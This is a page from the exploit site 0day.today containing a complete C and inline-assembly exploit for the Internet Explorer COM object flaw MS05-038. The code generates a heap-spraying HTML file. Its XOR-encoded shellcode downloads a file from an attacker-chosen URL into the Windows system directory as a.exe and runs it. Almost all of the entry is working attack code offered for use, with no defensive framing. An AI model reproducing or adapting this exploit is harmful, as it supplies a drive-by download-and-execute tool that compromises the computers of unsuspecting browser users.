0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS Internet Explorer COM Objects File Download Exploit (MS05-038)
================================================================= MS Internet Explorer COM Objects File Download Exploit (MS05-038) ================================================================= /*+++++++++++++++++++++++++++++++++++++++++++++++ Ms05 038 exploit POC Write By ZwelL 2005 8 11 http://www.donews.net/zwell zwell@sohu.com Some code belongs to Lion(cnhonker), regards to him. This code tested on Windows 2003 -----------------------------------------------*/ #include <stdio.h> #include <winsock2.h> #pragma comment(lib, "ws2_32") // Use for find the ASM code #define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90 #define PROC_END PROC_BEGIN #define SEARCH_STR "\x90\x90\x90\x90\x90\x90\x90\x90\x90" #define SEARCH_LEN 8 #define MAX_SC_LEN 2048 #define HASH_KEY 13 // Define Decode Parameter #define DECODE_LEN 21 #define SC_LEN_OFFSET 7 #define ENC_KEY_OFFSET 11 #define ENC_KEY 0xff // Define Function Addr #define ADDR_LoadLibraryA [esi] #define ADDR_GetSystemDirectoryA [esi+4] #define ADDR_WinExec [esi+8] #define ADDR_ExitProcess [esi+12] #define ADDR_URLDownloadToFileA [esi+16] // Need functions unsigned char functions[100][128] = { // [esi] stack layout // kernel32 4 // 00 kernel32.dll {"LoadLibraryA"}, // [esi] {"GetSystemDirectoryA"}, // [esi+4] {"WinExec"}, // [esi+8] {"ExitProcess"}, // [esi+12] // urlmon 1 // 01 urlmon.dll {"URLDownloadToFileA"}, // [esi+16] {""}, }; // Shellcode string unsigned char sc[1024] = {0}; unsigned int Sc_len; char *htmlbody1= "<html><body>\r\n" "<SCRIPT language=\"javascript\">\r\n" "shellcode = unescape(\"%u4343%u4343\"+\""; char *htmlbody2= "\");\r\n" "bigblock = unescape(\"%u0D0D%u0D0D\");\r\n" "headersize = 20;\r\n" "slackspace = headersize+shellcode.length;\r\n" "while (bigblock.length<slackspace) bigblock+=bigblock;\r\n" "fillblock = bigblock.substring(0, slackspace);\r\n" "block = bigblock.substring(0, bigblock.length-slackspace);\r\n" "while(block.length+slackspace<0x40000) block = block+block+fillblock;\r\n" "memory = new Array();\r\n" "for (i=0;i<750;i++) memory[i] = block + shellcode;\r\n" "</SCRIPT>\r\n" "<object classid=\"CLSID:083863F1-70DE-11d0-BD40-00A0C911CE86\"></object>\r\n" "Ms05038 Exploit POC<br>\r\n" "Made By ZwelL< http://www.donews.net/zwell>\r\n" "</html>"; // ASM shellcode main function void ShellCode(); // Get function hash static DWORD __stdcall GetHash ( char *c ) { DWORD h = 0; while ( *c ) { __asm ror h, HASH_KEY h += *c++; } return( h ); } int buildfile(unsigned char *sc, int len) { int i; char writebuf[4096]; char tmp[4096]; FILE *stream; memset(tmp, 0, 4096); memset(writebuf, 0, 4096); for(i = 0; i < len; i++) { sprintf(writebuf, "%s%.2x", writebuf, sc[i] & 0xff); } if(strlen(writebuf)%4!=0) strcat(writebuf, "00"); for(i=0; i<(strlen(writebuf)/4); i++) { strcat(tmp, "\%u"); strncat(tmp, &writebuf[i*4+2], 2); strncat(tmp, &writebuf[i*4], 2); } //printf("%s\n", writebuf); //printf("======================\n%s\n", tmp); if( (stream = fopen( "zwell_ms05038.html", "w+b" )) != NULL ) { fwrite(htmlbody1, strlen(htmlbody1), 1, stream); fwrite( tmp, strlen(tmp), 1, stream ); fwrite(htmlbody2, strlen(htmlbody2), 1, stream); fclose(stream); } else { printf("fopen wrong\n"); exit(0); } return 0; } void Make_ShellCode(char *url1) { unsigned char *pSc_addr; unsigned int Enc_key=ENC_KEY; unsigned long dwHash[100]; unsigned int dwHashSize; int i,j,k,l; // Get functions hash //printf("[+] Get functions hash strings.\r\n"); for (i=0;;i++) { if (functions[i][0] == '\x0') break; dwHash[i] = GetHash((char*)functions[i]); //printf("\t%.8X\t%s\n", dwHash[i], functions[i]); } dwHashSize = i*4; // Deal with shellcode pSc_addr = (unsigned char *)ShellCode; for (k=0;k<MAX_SC_LEN;++k ) { if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0) { break; } } pSc_addr+=(k+SEARCH_LEN); // Start of the ShellCode for (k=0;k<MAX_SC_LEN;++k) { if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0) { break; } } Sc_len=k; // Length of the ShellCode memcpy(sc, pSc_addr, Sc_len); // Copy shellcode to sc[] // Add functions hash memcpy(sc+Sc_len, (char *)dwHash, dwHashSize); Sc_len += dwHashSize; // Add url memcpy(sc+Sc_len, url1, strlen(url1)+1); Sc_len += strlen(url1)+1; // Deal with find the right XOR byte for(i=0xff; i>0; i--) { l = 0; for(j=DECODE_LEN; j<Sc_len; j++) { if ( ((sc[j] ^ i) == 0x26) || //% ((sc[j] ^ i) == 0x3d) || //= ((sc[j] ^ i) == 0x3f) || //? ((sc[j] ^ i) == 0x40) || //@ ((sc[j] ^ i) == 0x00) || ((sc[j] ^ i) == 0x0D) || ((sc[j] ^ i) == 0x0A) ) // Define Bad Characters { l++; // If found the right XOR byte,l equals 0 break; }; } if (l==0) { Enc_key = i; //printf("[+] Find XOR Byte: 0x%02X\n", i); for(j=DECODE_LEN; j<Sc_len; j++) { sc[j] ^= Enc_key; } break; // If found the right XOR byte, Break } } // Deal with not found XOR byte if (l!=0) { printf("[-] No xor byte found!\r\n"); exit(-1); } // Deal with DeCode string *(unsigned char *)&sc[SC_LEN_OFFSET] = Sc_len; *(unsigned char *)&sc[ENC_KEY_OFFSET] = Enc_key; printf("[+] download url:%s\n", url1); } int help() { printf("Usage : ms05038.exe url [-t] \n"); printf(" the 't' option will let you test for the shellcode first\n"); exit(0); } void main(int argc, char **argv) { WSADATA wsa; unsigned char url[255]={0}; BOOL b_test; printf("\n========================================\n"); printf("Ms05-038 exploit POC\n"); printf("Write By Zwell\n"); printf("2005-8-11\n"); printf("http://www.donews.net/zwell\n"); printf("zwell@sohu.com\n"); printf("========================================\n\n"); b_test=FALSE; if(argc<2) help(); strncpy(url, argv[1], 255); if(argc == 3) if(!strcmp(argv[2], "-t")) b_test = TRUE; WSAStartup(MAKEWORD(2,2),&wsa); Make_ShellCode(url); printf("[+] Build shellcode successful\n"); buildfile(sc, Sc_len); printf("[+] Build file successful\n"); printf("Now, you can open the builded file(zwell_ms05038.html) with IE to see the result.Good Luck ^_^\n"); if(b_test) { printf("Testing the shellcode...\n"); ((void (*)(void)) &sc)(); } return; } // ShellCode function void ShellCode() { __asm { PROC_BEGIN // C macro to begin proc //-------------------------------------------------------------------- // // DeCode // //-------------------------------------------------------------------- jmp short decode_end decode_start: pop ebx // Decode start addr (esp -> ebx) dec ebx xor ecx,ecx mov cl,0xFF // Decode len decode_loop: xor byte ptr [ebx+ecx],ENC_KEY // Decode key loop decode_loop jmp short decode_ok decode_end: call decode_start decode_ok: //-------------------------------------------------------------------- // // ShellCode // //-------------------------------------------------------------------- jmp sc_end sc_start: pop edi // Hash string start addr (esp -> edi) // Get kernel32.dll base addr mov eax, fs:0x30 // PEB mov eax, [eax+0x0c] // PROCESS_MODULE_INFO mov esi, [eax+0x1c] // InInitOrder.flink lodsd // eax = InInitOrder.blink mov ebp, [eax+8] // ebp = kernel32.dll base address mov esi, edi // Hash string start addr -> esi // Get function addr of kernel32 push 4 pop ecx getkernel32: call GetProcAddress_fun loop getkernel32 // Get function addr of urlmon push 0x00006e6f push 0x6d6c7275 // urlmon push esp call ADDR_LoadLibraryA // LoadLibraryA("urlmon"); mov ebp, eax // ebp = urlmon.dll base address /* push 1 pop ecx geturlmon: call GetProcAddress_fun loop geturlmon */ call GetProcAddress_fun // url start addr = edi //LGetSystemDirectoryA: sub esp, 0x20 mov ebx, esp push 0x20 push ebx call ADDR_GetSystemDirectoryA // GetSystemDirectoryA //LURLDownloadToFileA: // eax = system path size // URLDownloadToFileA url save to a.exe mov dword ptr [ebx+eax], 0x652E615C // "\a.e" mov dword ptr [ebx+eax+0x4], 0x00006578 // "xe" xor eax, eax push eax push eax push ebx // %systemdir%\a.exe push edi // url push eax call ADDR_URLDownloadToFileA // URLDownloadToFileA //LWinExec: mov ebx, esp push eax push ebx call ADDR_WinExec // WinExec(%systemdir%\a.exe); Finished: //push 1 call ADDR_ExitProcess // ExitProcess(); GetProcAddress_fun: push ecx push esi mov esi, [ebp+0x3C] // e_lfanew mov esi, [esi+ebp+0x78] // ExportDirectory RVA add esi, ebp // rva2va push esi mov esi, [esi+0x20] // AddressOfNames RVA add esi, ebp // rva2va xor ecx, ecx dec ecx find_start: inc ecx lodsd add eax, ebp xor ebx, ebx hash_loop: movsx edx, byte ptr [eax] cmp dl, dh jz short find_addr ror ebx, HASH_KEY // hash key add ebx, edx inc eax jmp short hash_loop find_addr: cmp ebx, [edi] // compare to hash jnz short find_start pop esi // ExportDirectory mov ebx, [esi+0x24] // AddressOfNameOrdinals RVA add ebx, ebp // rva2va mov cx, [ebx+ecx*2] // FunctionOrdinal mov ebx, [esi+0x1C] // AddressOfFunctions RVA add ebx, ebp // rva2va mov eax, [ebx+ecx*4] // FunctionAddress RVA add eax, ebp // rva2va stosd // function address save to [edi] pop esi pop ecx ret sc_end: call sc_start PROC_END //C macro to end proc } } # 0day.today [2024-12-24] #